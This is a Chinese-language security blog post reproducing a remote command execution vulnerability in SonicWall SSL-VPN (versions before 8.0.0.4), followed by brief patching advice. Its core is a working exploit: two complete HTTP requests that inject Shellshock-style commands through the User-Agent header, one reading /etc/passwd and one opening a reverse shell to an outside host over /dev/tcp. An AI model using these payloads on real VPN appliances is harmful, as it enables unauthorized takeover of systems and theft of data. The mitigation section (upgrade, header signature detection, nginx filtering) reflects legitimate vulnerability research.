SonicWall SSL-VPN 远程命令执行漏洞

772 阅读1分钟

图片

SonicWall SSL-VPN 远程命令执行漏洞

一、漏洞描述

SonicWall SSL-VPN 历史版本远程命令执行漏洞以及相关利用脚本。由于SonicWall SSL-VPN使用了旧版本内核以及HTTP CGI 可执行程序,攻击者可构造恶意其HTTP请求头,造成远程任意命令执行,并获得主机控制权限,软件影响版本 vpn<8.0.0.4

二、漏洞复现

exp:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 
Host: thelostworld:8080 
User-Agent: () { :; }; echo ; /bin/bash -c "cat /etc/passwd" 
Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding: gzip, deflate 
Connection: close

访问执行查看:cat /etc/passwd

图片

执行反弹shell

GET /cgi-bin/jarrewrite.sh HTTP/1.1 
Host: thelostworld:8080  
User-Agent: () { :; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/thelostworld/8080 0>&1 &" 
Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding: gzip, deflate 
Connection: close

图片

成功获取到shell:

图片

简单的脚本尝试验证:

图片

执行打印:

图片

三、防护修补建议

通用修补建议

升级到 Sonic SMA 8.0.0.4

临时修补建议

针对 http header 进行检测

可能存在的特征字符串如下() { :; };

使用 nginx 反向代理对 header 进行强制过滤

location  /cgi-bin/jarrewrite.sh {
    proxy_pass http://your-ssl-vpn:your-ssl-vpn-port$request_uri;
    proxy_set_header host $http_host;
    proxy_set_header user-agent "sonicwall ssl-vpn rec fix";
}

参考:

my.oschina.net/u/4600927/b…

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

图片

个人知乎:www.zhihu.com/people/fu-w…

个人简书:www.jianshu.com/u/bf0e38a8d…

个人CSDN:blog.csdn.net/qq\_3760279…

个人博客园:www.cnblogs.com/thelostworl…

FREEBUF主页:www.freebuf.com/author/thel…

图片